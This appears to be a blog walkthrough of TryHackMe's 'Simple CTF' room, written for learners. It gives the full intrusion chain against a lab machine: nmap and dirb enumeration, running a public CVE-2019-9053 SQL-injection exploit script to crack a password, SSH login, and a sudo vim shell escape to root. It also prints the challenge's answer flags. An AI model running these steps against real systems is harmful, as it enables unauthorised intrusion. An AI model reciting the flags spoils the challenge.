Simple CTF Walkthrough
Discover the step-by-step solution for the Simple CTF challenge on TryHackMe.
Updated
•4 min read
A
I'm a full-stack developer
Enumeration
sudo nmap -sT -sV -A -p- 10.10.134.123 -oN enum.txt
Result:
Nmap scan report for 10.10.134.123
Host is up (0.20s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.23.178.131
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|2.6.X|3.X|5.X (97%)
OS CPE: cpe:/o:linux:linux_kernel:4.15 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:5
Aggressive OS guesses: Linux 4.15 (97%), Linux 4.4 (91%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 4.15 - 5.19 (91%), Linux 5.0 - 5.14 (91%), Linux 2.6.32 - 3.10 (91%), Linux 3.10 - 3.13 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 241.40 ms 10.23.0.1
2 241.53 ms 10.10.134.123
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
For port 1000 if we run sudo nmap -sT -sV -A -p 1000 10.10.134.123 will find 2 services running on port 1000 so:
💡
How many services are running under port 1000?
2💡
What is running on the higher port?
ssh Running on port 2222Dir Enum
Using gobuster, dirb or any similar tools (im going with dirb
dirb http://10.10.134.123
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.134.123/ ----
+ http://10.10.134.123/index.html (CODE:200|SIZE:11321)
+ http://10.10.134.123/robots.txt (CODE:200|SIZE:929)
+ http://10.10.134.123/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.134.123/simple/
---- Entering directory: http://10.10.134.123/simple/ ----
==> DIRECTORY: http://10.10.134.123/simple/admin/
==> DIRECTORY: http://10.10.134.123/simple/assets/
==> DIRECTORY: http://10.10.134.123/simple/doc/
+ http://10.10.134.123/simple/index.php (CODE:200|SIZE:19993)
==> DIRECTORY: http://10.10.134.123/simple/lib/
==> DIRECTORY: http://10.10.134.123/simple/modules/
==> DIRECTORY: http://10.10.134.123/simple/tmp/
==> DIRECTORY: http://10.10.134.123/simple/uploads/
---- Entering directory: http://10.10.134.123/simple/admin/ ----
--> Test + http://10.10.134.123/simple/admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.134.123/simple/admin/lang/
If we open http://10.10.134.123/simple/ we will find the following
Small search with this cms version we will find CVE-2019-9053
💡
What's the CVE you're using against the application?
CVE-2019-9053In vulnerability details we will find its venerable with SQL Injection
💡
To what kind of vulnerability is the application vulnerable?
sqliSQL Injection
python CVE-2019-9053.py -u http://10.10.2.28/simple/ --crack -w 10k-most-common.txt
💡
What's the password?
secretSSH
using username mitch and password secret we will try to login via ssh
ssh -p 2222 mith@10.10.134.123
Yep now i have ssh access
💡
What's the user flag?
G00d j0b, keep up!
💡
Is there any other user in the home directory? What's its name?
sunbathPrivilege escalation
using sudo -l to see commands that we can execute with root privileges
💡
What can you leverage to spawn a privileged shell?
vimGo to https://gtfobins.github.io/ to find how to escalate using vim
sudo vim -c ':!/bin/sh'
Now we have access with root user
inside /root we can find root.txt
💡
What's the root flag?
W3ll d0n3. You made it!Additional found vulnerability
ftp:
We can find that we could login using ftp anonymously
Found file ForMitch.txt . get it
